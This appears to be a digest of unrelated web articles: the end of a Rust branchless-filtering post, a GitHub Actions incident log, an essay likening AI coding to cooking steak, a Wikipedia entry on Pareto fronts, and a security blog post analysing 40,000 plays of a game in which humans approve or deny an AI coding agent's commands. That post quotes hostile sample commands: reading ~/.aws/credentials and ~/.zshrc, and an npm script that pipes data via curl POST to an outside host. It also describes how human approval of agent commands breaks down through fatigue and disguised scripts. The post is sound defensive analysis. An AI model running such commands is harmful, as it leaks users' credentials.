Same mil­lion floats. Same thresh­old. Same func­tion. 4.5 times faster. On sorted data the branch says skip” for the en­tire first half and keep” for the en­tire sec­ond half. Such a pat­tern even the sim­plest pre­dic­tor learns af­ter one miss.

Stack Overflow has a ques­tion with 27K up­votes and it’s ex­actly about that ef­fect: Why is pro­cess­ing a sorted ar­ray faster than pro­cess­ing an un­sorted ar­ray?”.

Of course, sort­ing the in­put is not a fix: sort­ing costs much more than the fil­ter­ing it­self, and we usu­ally need the orig­i­nal or­der any­way. But now we know what ex­actly to fix. Can we keep the data shuf­fled and still avoid the coin flip?

Welcome branch­less pro­gram­ming

The idea of branch­less pro­gram­ming is to re­move the un­pre­dictable branch en­tirely, so there is noth­ing to guess. Instead of de­cid­ing whether to write an el­e­ment, we al­ways write it, and use the com­par­i­son to de­cide where the next el­e­ment goes:

pub fn fil­ter_branch­less(in­put: &[f64], thresh­old: f64) -> Vec<f64> { let mut out = vec![0.0; in­put.len()]; let mut n = 0; for &x in in­put { out[n] = x; n += (x > thresh­old) as usize; } out.trun­cate(n); out }

Take a minute to ap­pre­ci­ate the trick:

Every el­e­ment is writ­ten to out[n] un­con­di­tion­ally.

(x > thresh­old) as usize is 1 when we keep the el­e­ment and 0 oth­er­wise.

If the el­e­ment is kept, the cur­sor n moves for­ward. If not, the next it­er­a­tion sim­ply over­writes the re­jected value.

At the end n holds the num­ber of kept el­e­ments, and trun­cate(n) cuts off the garbage tail.

The com­par­i­son is still there, but its re­sult is now used as a num­ber, not as a de­ci­sion where the pro­gram goes next. In com­piler terms, we turned a con­trol de­pen­dency into a data de­pen­dency. Indeed, in the gen­er­ated as­sem­bly the com­par­i­son be­comes a seta in­struc­tion that just pro­duces 0 or 1. There is no fork in the road any­more, so there is noth­ing to mis­pre­dict.

(A care­ful reader may ob­ject: out[n] = x per­forms a bounds check, and the loop con­di­tion is also a branch. True! But those branches go the same way a mil­lion times in a row, so the pre­dic­tor han­dles them for free. Only the un­pre­dictable branch had to go.)

The re­sults:

The worst case be­came al­most 4 times faster. And look how flat the branch­less col­umn is: the run­ning time does not de­pend on the data any­more, ex­actly as we wanted.

Notice the price we paid though. At 1% kept the id­iomatic ver­sion wins, be­cause an al­most al­ways cor­rectly pre­dicted branch is nearly free, while the branch­less ver­sion al­ways pays for one mil­lion writes. Branchless code is not faster in gen­eral: it trades the best case for the worst case.

Should you go branch­less?

Most of the time, no. Branchless code is harder to read and eas­ier to get wrong. Besides, com­pil­ers know a lot of tricks and al­ready do a lot of this work for us.

Only when a pro­filer points at a hot loop, and the loop con­tains a branch on un­pre­dictable data this tech­nique can pay off big.

Conclusions

A branch is cheap. A mis­pre­dicted branch is not.

That is why the same fil­ter is slow­est around 50% se­lec­tiv­ity on shuf­fled data: the branch pre­dic­tor is re­duced to a coin flip.

Branchless pro­gram­ming re­places the un­pre­dictable branch with plain arith­metic: al­ways write, con­di­tion­ally ad­vance. The worst case got al­most 4 times faster and be­came in­de­pen­dent of the data.

It is a trade, not magic: the best case gets worse, and read­abil­ity suf­fers. Reserve it for mea­sured hot paths.

Links

branch­less-rust-bench­marks - code and bench­marks from this ar­ti­cle

Why is pro­cess­ing a sorted ar­ray faster than pro­cess­ing an un­sorted ar­ray? - Stack Overflow

Branch pre­dic­tor - Wikipedia

Mispredicted branches can mul­ti­ply your run­ning times - Daniel Lemire

Branchless Programming in C++ - Fedor Pikus, CppCon 2021

P.S.

This post went vi­ral on Reddit and HackerNews.

Since it’s be­ing dis­cussed a lot and it seems to be very im­por­tant for some peo­ple: yes, I used LLM to help me to as­sem­ble the ar­ti­cle. I’ve added a DISCLAIMER at the top.

For me, as for many of oth­ers, LLM is just a tool that helps to archive a goal faster. I am not push­ing the con­tent blindly: I struc­ture it, read it, re­view it, and edit un­til I am sat­is­fied with the re­sult.

Back to top

Incident with Actions

www.githubstatus.com

Update

We con­tinue to make progress on the is­sue af­fect­ing GitHub Actions. We have de­ployed a fix that ad­dresses run­ners be­ing as­signed jobs that are no longer valid, and are see­ing im­prove­ment in job com­ple­tion rates. For work­flow runs that are start­ing, suc­cess rates have in­creased sig­nif­i­cantly and are now at 97%. Standard and larger run­ners are now drain­ing queued work. A change is also in progress to mit­i­gate is­sues with ex­ist­ing self-hosted run­ners that are not pick­ing up jobs.

Webhook trig­gers re­main throt­tled to sup­port re­cov­ery. Many push and pull re­quest events are not yet trig­ger­ing new work­flow runs, and we are work­ing to safely re­store full through­put.

GitHub Pages, Copilot code re­view, and Copilot cod­ing agent may still ex­pe­ri­ence fail­ures or de­lays. Migrations us­ing GitHub Enterprise Importer re­main paused.

We are con­tin­u­ing to mon­i­tor re­cov­ery and will pro­vide an­other up­date as con­di­tions im­prove.

Posted Aug 06, 2026 – 22:18 UTC

Update

We are con­tin­u­ing to work on an is­sue af­fect­ing GitHub Actions. Webhook trig­gers re­main throt­tled to aid re­cov­ery, so many push and pull re­quest events are not trig­ger­ing new work­flow runs.

We iden­ti­fied run­ners be­ing as­signed jobs that are no longer valid and are de­ploy­ing a change to ad­dress this is­sue. Both GitHub-hosted and self-hosted run­ners are af­fected.

Copilot code re­view, Copilot cod­ing agent, and GitHub Pages may ex­pe­ri­ence fail­ures or de­lays. Migrations us­ing GitHub Enterprise Importer have been paused to sup­port mit­i­ga­tion ef­forts.

Posted Aug 06, 2026 – 21:30 UTC

Update

We are con­tin­u­ing to work on an is­sue af­fect­ing GitHub Actions. Webhook trig­gers are cur­rently throt­tled to help with re­cov­ery and and we are pro­cess­ing ap­prox­i­mately 15% of web­hooks, so many events such as pushes and pull re­quests are not trig­ger­ing work­flow runs. Of jobs queued, ap­prox­i­mately 65% are suc­ceed­ing, im­proved from a low of 30 to 40% ear­lier in this in­ci­dent.

We have nar­rowed the re­main­ing im­pact to run­ners that are stuck retry­ing jobs that are no longer avail­able. Both GitHub-hosted and self-hosted run­ners are af­fected, and we are work­ing to re­cover them.

Copilot code re­view, Copilot cod­ing agent, and mi­gra­tions us­ing GitHub Enterprise Importer may also be af­fected.

Posted Aug 06, 2026 – 20:34 UTC

Update

We are con­tin­u­ing to work on an is­sue af­fect­ing GitHub Actions.

Capacity re­mains con­strained and jobs may still be de­layed or fail while it re­cov­ers grad­u­ally. Customers us­ing self-hosted run­ners may see er­rors or rate lim­it­ing when run­ners reg­is­ter.

Copilot code re­view, Copilot cod­ing agent, and mi­gra­tions us­ing GitHub Enterprise Importer may also be af­fected. Webhook de­liv­er­ies may be de­layed.

Our en­gi­neers re­main ac­tively en­gaged.

Posted Aug 06, 2026 – 19:43 UTC

Update

We are con­tin­u­ing to work on an is­sue af­fect­ing mul­ti­ple GitHub ser­vices.

Workflow runs are still fail­ing, and jobs may re­main queued for an ex­tended pe­riod be­fore start­ing or may time out. Jobs us­ing GitHub-hosted run­ners are par­tic­u­larly af­fected while ca­pac­ity is con­strained.

Customers us­ing self-hosted run­ners may see er­rors or rate lim­it­ing when run­ners reg­is­ter.

Copilot code re­view, Copilot cod­ing agent, and mi­gra­tions us­ing GitHub Enterprise Importer may also be af­fected. Webhook de­liv­er­ies may be de­layed.

Recovery is tak­ing longer than we ex­pected, and en­gi­neers re­main ac­tively en­gaged.

Posted Aug 06, 2026 – 18:46 UTC

Update

We are con­tin­u­ing to work on an is­sue af­fect­ing mul­ti­ple GitHub ser­vices.

Workflow runs are still fail­ing or de­layed in start­ing, and some queued jobs may time out.

Customers us­ing self-hosted run­ners may see er­rors or rate lim­it­ing when run­ners reg­is­ter.

Copilot code re­view, Copilot cod­ing agent, hosted run­ners, and mi­gra­tions us­ing GitHub Enterprise Importer may also be af­fected.

Webhook de­liv­er­ies may be de­layed.

Engineers have ap­plied fur­ther mit­i­ga­tions and are con­tin­u­ing to work to­wards full re­cov­ery.

Posted Aug 06, 2026 – 18:11 UTC

Update

We are con­tin­u­ing to work on an is­sue af­fect­ing mul­ti­ple GitHub ser­vices.

Workflow runs are fail­ing or de­layed in start­ing, and some queued jobs may time out.

Copilot code re­view, Copilot cod­ing agent, hosted run­ners, and mi­gra­tions us­ing GitHub Enterprise Importer might also af­fected.

Webhook de­liv­er­ies may be de­layed.

Engineers have ap­plied a num­ber of mit­i­ga­tions and are rolling out a fur­ther fix across all af­fected sys­tems now.

Posted Aug 06, 2026 – 17:40 UTC

Update

We are con­tin­u­ing to work on the is­sue af­fect­ing GitHub Actions.

Workflow runs are still fail­ing or de­layed in start­ing, and some queued jobs may time out.

Some re­quests to the Actions API are re­turn­ing er­rors. Customers run­ning mi­gra­tions with GitHub Enterprise Importer may see fail­ures.

Our en­gi­neers have ap­plied sev­eral mit­i­ga­tions and are rolling out a fur­ther fix now.

Posted Aug 06, 2026 – 17:02 UTC

Update

Actions and Pages are ex­pe­ri­enc­ing de­graded avail­abil­ity. We are con­tin­u­ing to in­ves­ti­gate.

Posted Aug 06, 2026 – 16:33 UTC

Update

We are con­tin­u­ing to work on the is­sue af­fect­ing GitHub Actions.

Some work­flow runs are still de­layed or fail­ing to com­plete, and some re­quests to the Actions API are re­turn­ing er­rors.

Customers run­ning mi­gra­tions with GitHub Enterprise Importer may also see fail­ures.

Engineers are ac­tively work­ing to­wards full re­cov­ery.

Posted Aug 06, 2026 – 16:27 UTC

Update

Pages is ex­pe­ri­enc­ing de­graded per­for­mance. We are con­tin­u­ing to in­ves­ti­gate.

Posted Aug 06, 2026 – 16:27 UTC

Update

Pages is op­er­at­ing nor­mally.

Posted Aug 06, 2026 – 16:19 UTC

Update

Pages is ex­pe­ri­enc­ing de­graded per­for­mance. We are con­tin­u­ing to in­ves­ti­gate.

Posted Aug 06, 2026 – 15:53 UTC

Update

We are in­ves­ti­gat­ing er­rors af­fect­ing GitHub Actions. Some work­flow runs are fail­ing to start or fail­ing part­way through, and some re­quests to the Actions REST API are re­turn­ing er­rors.

Some cus­tomers may also see un­ex­pected rate lim­it­ing in their work­flows.

Engineers have iden­ti­fied the source of the dis­rup­tion and are ac­tively work­ing on a mit­i­ga­tion

Posted Aug 06, 2026 – 15:45 UTC

Update

Actions is ex­pe­ri­enc­ing de­graded avail­abil­ity. We are con­tin­u­ing to in­ves­ti­gate.

Posted Aug 06, 2026 – 15:41 UTC

Investigating

We are in­ves­ti­gat­ing re­ports of de­graded per­for­mance for Actions

Posted Aug 06, 2026 – 15:22 UTC

This in­ci­dent af­fects: Actions and Pages.

Almost No Skill Required to Cook a Steak (Though You Probably Can’t Make a Decent One)

blog.sydorets.com

Cooking a steak re­quires al­most no skill.

Put it in a hot pan, wait a lit­tle, flip it, and even­tu­ally you’ll have some­thing tech­ni­cally ed­i­ble. But a gen­uinely good steak, medium-rare from edge to edge, browned prop­erly, sea­soned right, con­sis­tently de­li­cious, is a dif­fer­ent mat­ter en­tirely.

Software de­vel­op­ment with AI is start­ing to feel much the same.

We build non­stop now. With AI, with­out AI, dur­ing the com­mute, on the toi­let, prob­a­bly in our sleep. We cre­ate agents, har­nesses, tools, skills, prompts, feed­back loops, elab­o­rate work­flows. Then we throw every­thing at a model and hope it gives us what we imag­ined, with­out ever hav­ing to un­der­stand how any of it ac­tu­ally works.

And what do we want?

We want the per­fect steak.

We want soft­ware that works, looks good, feels pol­ished, and ar­rives ex­actly as we imag­ined it. Most of all, we want the same re­sult every time.

Do we get it?

Not every time. Not even close to every time.

Sometimes the model hands us some­thing sur­pris­ingly good. Other times it serves up char­coal with a sprig of thyme on top and calls it medium-rare, com­pletely con­fi­dent in the lie.

So what do we do?

We go to a restau­rant.

We pay for a pre­mium AI prod­uct, hire an agency, sub­scribe to an­other cod­ing as­sis­tant, jump to a new frame­work promis­ing pro­fes­sional re­sults. We hope some­one else al­ready solved the prob­lem for us. Sometimes they have. Quite of­ten, they haven’t.

That leaves two choices: learn to cook prop­erly our­selves, or keep ask­ing friends for restau­rant rec­om­men­da­tions while prepar­ing our wal­lets for the next ex­pen­sive dis­ap­point­ment.

Most of us want to build some­thing we care about with AI with­out get­ting lost in the im­ple­men­ta­tion de­tails. We want to treat it like a pro­fes­sional chef work­ing in our own kitchen: tell it what we want, step away, come back when din­ner’s ready.

But AI is­n’t a chef. At best, it’s a steak ma­chine.

It can fol­low a recipe. Watch the tem­per­a­ture, flip at the right mo­ment, drop in the but­ter. Give it enough tools and in­struc­tions and it’ll re­peat that process fast, at enor­mous scale. What it does­n’t do is know what you ac­tu­ally want.

It can’t see the pic­ture in your head un­less you trans­late it into re­quire­ments, con­straints, ex­am­ples, tests, feed­back. And even then, it’s boxed in by its own ca­pa­bil­i­ties, its con­text win­dow, the qual­ity of the sys­tem wrapped around it. You can stand next to the ma­chine and cor­rect it every thirty sec­onds. That might help. It won’t turn the ma­chine into a Michelin-starred chef.

Eventually, frus­trated, you de­cide to just pay for the dream steak.

You pick the ex­pen­sive restau­rant. Sit down, study the menu, fi­nally, you can or­der with real con­fi­dence. You wait for the first bite.

The plate ar­rives.

Same burnt steak you made at home.

Why? Because every restau­rant in the city hired the same AI cook.

Cost op­ti­miza­tion,” man­age­ment says. Most peo­ple won’t no­tice.”

And they’re prob­a­bly right. Most peo­ple won’t. Most of the time, soft­ware only has to be ac­cept­able. Customers tol­er­ate weird in­ter­faces, point­less fea­tures, strange bugs, sys­tems held to­gether by gen­er­ated code no­body ac­tu­ally un­der­stands.

But you’ll no­tice.

You’ll no­tice be­cause this was some­thing you ac­tu­ally wanted to make.

So you go home dis­ap­pointed, hun­gry, a lit­tle em­bar­rassed, and pull the cook­book off the shelf. There’s only one op­tion left: learn to cook.

You learn what heat ac­tu­ally does. Which pan mat­ters and why. Why thick­ness mat­ters, why rest­ing mat­ters, why a timer alone was never go­ing to save you. You ruin a few more din­ners. Then you try again. And again.

Eventually you stop de­pend­ing on luck, you learned it the hard way.

Software works the same way.

AI can make you faster. It au­to­mates the repet­i­tive stuff, spits out a start­ing point, ex­plains code, helps you poke at ideas. What it can’t do is re­place your judg­ment. It can’t de­fine qual­ity for you, can’t de­cide which trade­offs are ac­cept­able, can’t al­ways catch the mo­ment when some­thing is tech­ni­cally cor­rect but wrong in every way that mat­ters.

To build good soft­ware with AI, you still have to un­der­stand soft­ware.

You need to know what you’re ac­tu­ally ask­ing for, how to judge what comes back, and when the ma­chine is just con­fi­dently serv­ing you char­coal.

Keep learn­ing. Keep build­ing. Keep fail­ing. Do that un­til you can pro­duce the re­sult you want in­stead of hop­ing to stum­ble into it.

Then get good enough to open your own small restau­rant.

Then hire a few AI cooks. Most peo­ple still won’t no­tice the dif­fer­ence.

But you will.

Humans missed 1 in 3 threats approving AI agent commands across 40,000 plays

scalex.dev

A cou­ple of months ago I pub­lished a small browser game: you play the hu­man-in-the-loop for an AI cod­ing agent, ap­prov­ing or deny­ing its com­mands un­der time pres­sure. Some com­mands are rou­tine (git sta­tus, npm test) and some other com­mands in­di­cate your agent has been pos­sessed and is send­ing your se­crets to a re­mote server (cat ~/.aws/credentials). More on the threats as­so­ci­ated with agents run­ning com­mands and how to mit­i­gate them can be found in the orig­i­nal post.

The game gar­nered some in­ter­est on hacker news, and af­ter adding in sta­tis­tics (unfortunately a bit later on) we can take a closer look at the data of over 40,000 runs and 409,000 in­di­vid­ual ap­prove/​deny de­ci­sions. Let’s see how the hu­man-in-the-loop, our last line of de­fence against rogue agents, fared.

The head­line num­bers

The av­er­age player missed 1 in 3 threats (mean ac­cu­racy 66.3%)

32.9% of ses­sions ended with a neg­a­tive score: penal­ties from ap­proved threats and blocked safe com­mands out­weighed every­thing done right

35.2% of play­ers caught every threat, but only 20.8% man­aged that while block­ing at most 1 in 5 of the safe com­mands. The rest got there partly by block­ing every­thing (awarding the Human Bottleneck” ti­tle)

7% ap­proved every sin­gle prompt: big fans of –dangerously-skip-permissions

Small caveat: this was a game, where ap­prox­i­mately 34% of the com­mands play­ers saw were threats. In our day-to-day work these threats ap­pear rarely. Players knew they were be­ing tested in a time-boxed chal­lenge. But the num­bers be­low might be use­ful for gar­ner­ing some in­sights on com­par­ing threats and the gen­eral aware­ness of them against one an­other.

Threat cat­e­gories and miss rates

The bla­tantly de­struc­tive com­mands are caught most re­li­ably. The com­mands that ac­tu­ally ex­fil­trate your cre­den­tials are missed three times as of­ten.

The npm run blind spot

The sin­gle most-missed com­mand in the game is npm run an­a­lyze, ap­proved 64.7% of the time. The com­mand by it­self is typ­i­cally in­no­cent. But what npm run re­ally does is run a script that’s de­fined in your pro­jec­t’s pack­age.json. It could be be­nign code such as run­ning a bun­dle an­a­lyzer, or in­jected code that was writ­ten to file be­fore.

The game does tell you in the agen­t’s his­tory log what that script ac­tu­ally con­tains:

1✻ I’ll run the bun­dle an­a­lyzer — it’s al­ready set up in the pro­ject scripts. 2 // pack­age.json → scripts 3 analyze”: webpack-bundle-analyzer stats.json | tee /dev/fd/1 | 4 curl -s -X POST https://​api.bun­dle.track/​re­port -d @-”

Two thirds of play­ers ap­proved it any­way, in­di­cat­ing the his­tory log just above the per­mis­sion prompt may not be read closely. There are three of these in the game, and they ap­pear in the most-missed list:

Pooled, the three were missed 52.5% of the time (n=9,482) against 28.4% for every other ex­fil­tra­tion-style at­tack. Hiding a pay­load be­hind a fa­mil­iar script name roughly dou­bles its suc­cess rate even when the pay­load is shown in the his­tory log.

Which is re­ally a symp­tom of the big­ger prob­lem, well put by dns_s­nek in the Hacker News thread:

That’s a great ex­am­ple of how dan­ger­ous ac­tions are per­ceived as in­no­cent. The en­tire model of ap­prov­ing spe­cific com­mands is ab­solutely bonkers.npm run build = run an ar­bi­trary shell com­mand writ­ten in pack­age.json­Mean­while the agent could have done any of the fol­low­ing with­out ap­proval:edited pack­age.json to con­tain any ar­bi­trary build com­mand­planted ma­li­cious code in build.js (called by npm run build)planted ma­li­cious code in node_­mod­ules/​xyz/​in­dex.js (imported by build.js)

That’s a great ex­am­ple of how dan­ger­ous ac­tions are per­ceived as in­no­cent. The en­tire model of ap­prov­ing spe­cific com­mands is ab­solutely bonkers.

npm run build = run an ar­bi­trary shell com­mand writ­ten in pack­age.json

Meanwhile the agent could have done any of the fol­low­ing with­out ap­proval:

edited pack­age.json to con­tain any ar­bi­trary build com­mand

planted ma­li­cious code in build.js (called by npm run build)

planted ma­li­cious code in node_­mod­ules/​xyz/​in­dex.js (imported by build.js)

Asking the user to val­i­date com­mands, which are nearly all of the time safe, but aren’t any­more be­cause of mod­i­fied files, is not a strong safe­guard.

Miss rates in­crease un­der pres­sure

Anthropic pre­vi­ously noted per­mis­sion fa­tigue is real in claude code, with the fol­low­ing quote:

The more ap­provals a user sees, the less at­ten­tion they pay to each, be­com­ing over time much less dili­gent in their su­per­vi­sion

The more ap­provals a user sees, the less at­ten­tion they pay to each, be­com­ing over time much less dili­gent in their su­per­vi­sion

And al­though it’s a short game where the user is warned about threats, we can see some signs of degra­da­tion to­wards the end of game runs:

The graph above shows the threat miss rate along the ses­sion, with the plays grouped to­gether on how many com­mands the user com­pleted. Users com­plet­ing a lower num­ber of com­mands can be due to the user tak­ing more time to re­view them, or be­cause of the game freez­ing for a cou­ple of sec­onds af­ter an er­ror was made as penalty. I’ve re­moved all the users who sim­ply blocked every­thing.

Every group im­proves over the first cou­ple of com­mands (warming up?) and then the miss rates climb back up to­wards the end. Although this might also be the stress of the clock run­ning out and the player be­com­ing more likely to make mis­takes to get some ex­tra com­mands in.

The cost of vig­i­lance: over-block­ing

The fol­low­ing com­mands were be­nign in in­tent, but rou­tinely blocked:

npm con­fig set reg­istry https://​npm.in­ter­nal — blocked 59% of the time (setting an in­ter­nal mir­ror)

rm -rf dist/ — blocked 45% of the time (clearing build out­put, not un­com­mon to per­form be­fore a new build)

kill $(lsof -t -i:3000) — blocked 43% of the time (freeing the port the server is lis­ten­ing on, po­ten­tially be­cause of a crashed process)

This is the other side of the hu­man-in-the-loop dilemma. Users are asked to ap­prove com­mands which are ac­tu­ally be­nign, and block­ing them slows the agent down. Over time this noise will likely re­sult in users drop­ping their guard and ap­prov­ing ma­li­cious com­mands. Features such as Anthropic’s Auto Mode’ try to mit­i­gate this by au­to­mat­i­cally try­ing to de­ter­mine if a com­mand is safe be­fore ask­ing you, but they are not fool-proof as men­tioned in the pre­vi­ous post.

The con­tested cat

cat ~/.zshrc was ap­proved by 45.9% of play­ers, the most di­vi­sive com­mand in the game. The ob­jec­tion (raised on HN) is fair: plenty of de­vel­op­ers keep no se­crets in their shell pro­file, so for them it is harm­less. For the many who ex­port API keys there, it’s cre­den­tial dis­clo­sure. The com­mand’s risk de­pends en­tirely on a setup the agent can’t see. If you source a sep­a­rate se­crets file from your .zshrc in­stead, the risk of your agent get­ting more ac­cess is re­duced.

The take­away

I’ve en­joyed fol­low­ing the dis­cus­sions on the hu­man-in-the-loop, and learn­ing more on per­mis­sion mod­els along the way. While it’s just a game, I find it does demon­strate sev­eral is­sues with hu­mans-in-the-loop as safe­guard for AI cod­ing agents. The high amount of noise in­tro­duces fa­tigue, and de­vel­op­ers don’t al­ways have the con­text of what has changed to quickly de­ter­mine the risk.

For de­vel­op­ers, we need to be very fa­mil­iar with the trade-offs of dif­fer­ent per­mis­sions mod­els and how to re­duce the risks in­volved such as ap­ply­ing sand­box­ing and sep­a­rat­ing cre­den­tials and env var se­crets. The orig­i­nal post cov­ers some of these prac­ti­cal mit­i­ga­tions.

If you want to try your luck at the game, you can find it here: https://​llmgame.scalex.dev

Alex Wauters

Hi - I’m Alex. I write about de­vel­oper se­cu­rity and the trade­offs of build­ing and scal­ing soft­ware sys­tems. Ex-Staff Engineer at Uber.

Pareto front

en.wikipedia.org

From Wikipedia, the free en­cy­clo­pe­dia

In multi-ob­jec­tive op­ti­miza­tion, the Pareto front (also called Pareto fron­tier or Pareto curve) is the set of all Pareto ef­fi­cient so­lu­tions.[1] Colloquially, this means when there are many dis­tinct ob­jec­tives to con­sider in an op­ti­miza­tion prob­lem, a Pareto front rep­re­sents the set of so­lu­tions where no so­lu­tion out­per­forms any other so­lu­tion in the set at every ob­jec­tive, and every so­lu­tion not in the set is out­per­formed by at least one so­lu­tion in the Pareto front in every ob­jec­tive.[2] The con­cept is widely used in en­gi­neer­ing.[3]: 111 – 148  It al­lows the de­signer to re­strict at­ten­tion to the set of ef­fi­cient choices, and to make trade­offs within this set, rather than con­sid­er­ing the full range of every pa­ra­me­ter.[4]: 63 – 65 [5]: 399 – 412

The Pareto fron­tier, P(Y), may be more for­mally de­scribed as fol­lows. Consider a sys­tem with func­tion , where X is a com­pact set of fea­si­ble de­ci­sions in the met­ric space , and Y is the fea­si­ble set of cri­te­rion vec­tors in , such that .

We as­sume that the pre­ferred di­rec­tions of cri­te­ria val­ues are known. A point is pre­ferred to (strictly dom­i­nates) an­other point , writ­ten as . The Pareto fron­tier is thus writ­ten as:

Marginal rate of sub­sti­tu­tion

[edit]

A sig­nif­i­cant as­pect of the Pareto fron­tier in eco­nom­ics is that, at a Pareto-efficient al­lo­ca­tion, the mar­ginal rate of sub­sti­tu­tion is the same for all con­sumers.[6] A for­mal state­ment can be de­rived by con­sid­er­ing a sys­tem with m con­sumers and n goods, and a util­ity func­tion of each con­sumer as where is the vec­tor of goods, both for all i. The fea­si­bil­ity con­straint is for . To find the Pareto op­ti­mal al­lo­ca­tion, we max­i­mize the Lagrangian:

where and are the vec­tors of mul­ti­pli­ers. Taking the par­tial de­riv­a­tive of the Lagrangian with re­spect to each good for and gives the fol­low­ing sys­tem of first-or­der con­di­tions:

where de­notes the par­tial de­riv­a­tive of with re­spect to . Now, fix any and . The above first-or­der con­di­tion im­ply that

Thus, in a Pareto-optimal al­lo­ca­tion, the mar­ginal rate of sub­sti­tu­tion must be the same for all con­sumers.[7]

Algorithms for com­put­ing the Pareto fron­tier of a fi­nite set of al­ter­na­tives have been stud­ied in com­puter sci­ence and power en­gi­neer­ing.[8] They in­clude:

The max­ima of a point set”

The max­i­mum vec­tor prob­lem” or the sky­line query[9][10][11]

The scalar­iza­tion al­go­rithm” or the method of weighted sums[12][13]

The -constraints method”[14][15][16]

Multi-objective Evolutionary Algorithms [17][18]

Since gen­er­at­ing the en­tire Pareto front is of­ten com­pu­ta­tion­ally-hard, there are al­go­rithms for com­put­ing an ap­prox­i­mate Pareto-front. For ex­am­ple, Legriel et al.[19] call a set S an ε-ap­prox­i­ma­tion of the Pareto-front P, if the di­rected Hausdorff dis­tance be­tween S and P is at most ε. They ob­serve that an ε-ap­prox­i­ma­tion of any Pareto front P in d di­men­sions can be found us­ing (1/ε)d queries.

Zitzler, Knowles and Thiele[20] com­pare sev­eral al­go­rithms for Pareto-set ap­prox­i­ma­tions on var­i­ous cri­te­ria, such as in­vari­ance to scal­ing, mo­not­o­nic­ity, and com­pu­ta­tional com­plex­ity.

↑ prox­i­me­dia. Pareto Front”. www.ce­naero.be. Archived from the orig­i­nal on 2020 – 02-26. Retrieved 2018 – 10-08.

↑ Kang, Shida; Li, Kaiwen; Wang, Rui (2025 – 06-01). A sur­vey on pareto front learn­ing for multi-ob­jec­tive op­ti­miza­tion”. Journal of Membrane Computing. 7 (2): 128 – 134. doi:10.1007/​s41965 – 024-00170-z. ISSN 2523 – 8914.

↑ Goodarzi, E., Ziaei, M., & Hosseinipour, E. Z., Introduction to Optimization Analysis in Hydrosystem Engineering (Berlin/Heidelberg: Springer, 2014), pp. 111 – 148.

↑ Jahan, A., Edwards, K. L., & Bahraminasab, M., Multi-criteria Decision Analysis, 2nd ed. (Amsterdam: Elsevier, 2013), pp. 63 – 65.

↑ Costa, N. R., & Lourenço, J. A., Exploring Pareto Frontiers in the Response Surface Methodology”, in G.-C. Yang, S.-I. Ao, & L. Gelman, eds., Transactions on Engineering Technologies: World Congress on Engineering 2014 (Berlin/Heidelberg: Springer, 2015), pp. 399 – 412.

↑ Just, Richard E. (2004). The wel­fare eco­nom­ics of pub­lic pol­icy : a prac­ti­cal ap­proach to pro­ject and pol­icy eval­u­a­tion. Hueth, Darrell L., Schmitz, Andrew. Cheltenham, UK: E. Elgar. pp. 18 – 21. ISBN 1 – 84542-157 – 4. OCLC 58538348.

↑ Just, Richard E.; Hueth, Darrell L.; Schmitz, Andrew (2005 – 01-01). The Welfare Economics of Public Policy: A Practical Approach to Project and Policy Evaluation. Edward Elgar Publishing. ISBN 978 – 1-84542 – 157-1.

↑ Tomoiagă, Bogdan; Chindriş, Mircea; Sumper, Andreas; Sudria-Andreu, Antoni; Villafafila-Robles, Roberto (2013). Pareto Optimal Reconfiguration of Power Distribution Systems Using a Genetic Algorithm Based on NSGA-II”. Energies. 6 (3): 1439 – 55. doi:10.3390/​en6031439. hdl:2117/​18257.

↑ Nielsen, Frank (1996). Output-sensitive peel­ing of con­vex and max­i­mal lay­ers”. Information Processing Letters. 59 (5): 255 – 9. CiteSeerX 10.1.1.259.1042. doi:10.1016/​0020 – 0190(96)00116 – 0.

↑ Kung, H. T.; Luccio, F.; Preparata, F.P. (1975). On find­ing the max­ima of a set of vec­tors”. Journal of the ACM. 22 (4): 469 – 76. doi:10.1145/​321906.321910. S2CID 2698043.

↑ Godfrey, P.; Shipley, R.; Gryz, J. (2006). Algorithms and Analyses for Maximal Vector Computation”. VLDB Journal. 16: 5 – 28. CiteSeerX 10.1.1.73.6344. doi:10.1007/​s00778 – 006-0029 – 7. S2CID 7374749.

↑ Kim, I. Y.; de Weck, O. L. (2005). Adaptive weighted sum method for mul­ti­ob­jec­tive op­ti­miza­tion: a new method for Pareto front gen­er­a­tion”. Structural and Multidisciplinary Optimization. 31 (2): 105 – 116. doi:10.1007/​s00158 – 005-0557 – 6. ISSN 1615 – 147X. S2CID 18237050.

↑ Marler, R. Timothy; Arora, Jasbir S. (2009). The weighted sum method for multi-ob­jec­tive op­ti­miza­tion: new in­sights”. Structural and Multidisciplinary Optimization. 41 (6): 853 – 862. doi:10.1007/​s00158 – 009-0460 – 7. ISSN 1615 – 147X. S2CID 122325484.

On a Bicriterion Formulation of the Problems of Integrated System Identification and System Optimization”. IEEE Transactions on Systems, Man, and Cybernetics. SMC-1 (3): 296 – 297. 1971. doi:10.1109/​TSMC.1971.4308298. ISSN 0018 – 9472.

↑ Mavrotas, George (2009). Effective im­ple­men­ta­tion of the ε-con­straint method in Multi-Objective Mathematical Programming prob­lems”. Applied Mathematics and Computation. 213 (2): 455 – 465. doi:10.1016/​j.amc.2009.03.037. ISSN 0096 – 3003.

↑ Carvalho, Iago A.; Coco, Amadeu A. (September 2023). On solv­ing bi-ob­jec­tive con­strained min­i­mum span­ning tree prob­lems”. Journal of Global Optimization. 87 (1): 301 – 323. doi:10.1007/​s10898 – 023-01295 – 8.

↑ Zhang, Qingfu; Hui, Li (December 2007). MOEA/D: A Multiobjective Evolutionary Algorithm Based on Decomposition”. IEEE Transactions on Evolutionary Computation. 11 (6): 712 – 731. doi:10.1109/​TEVC.2007.892759.

↑ Carvalho, Iago A.; Ribeiro, Marco A. (November 2019). A node-depth phy­lo­ge­netic-based ar­ti­fi­cial im­mune sys­tem for multi-ob­jec­tive Network Design Problems”. Swarm and Evolutionary Computation. 50 100491. doi:10.1016/​j.sw­evo.2019.01.007.

↑ Legriel, Julien; Le Guernic, Colas; Cotton, Scott; Maler, Oded (2010). Approximating the Pareto Front of Multi-criteria Optimization Problems”. In Esparza, Javier; Majumdar, Rupak (eds.). Tools and Algorithms for the Construction and Analysis of Systems. Lecture Notes in Computer Science. Vol. 6015. Berlin, Heidelberg: Springer. pp. 69 – 83. doi:10.1007/​978 – 3-642 – 12002-2_6. ISBN 978 – 3-642 – 12002-2.

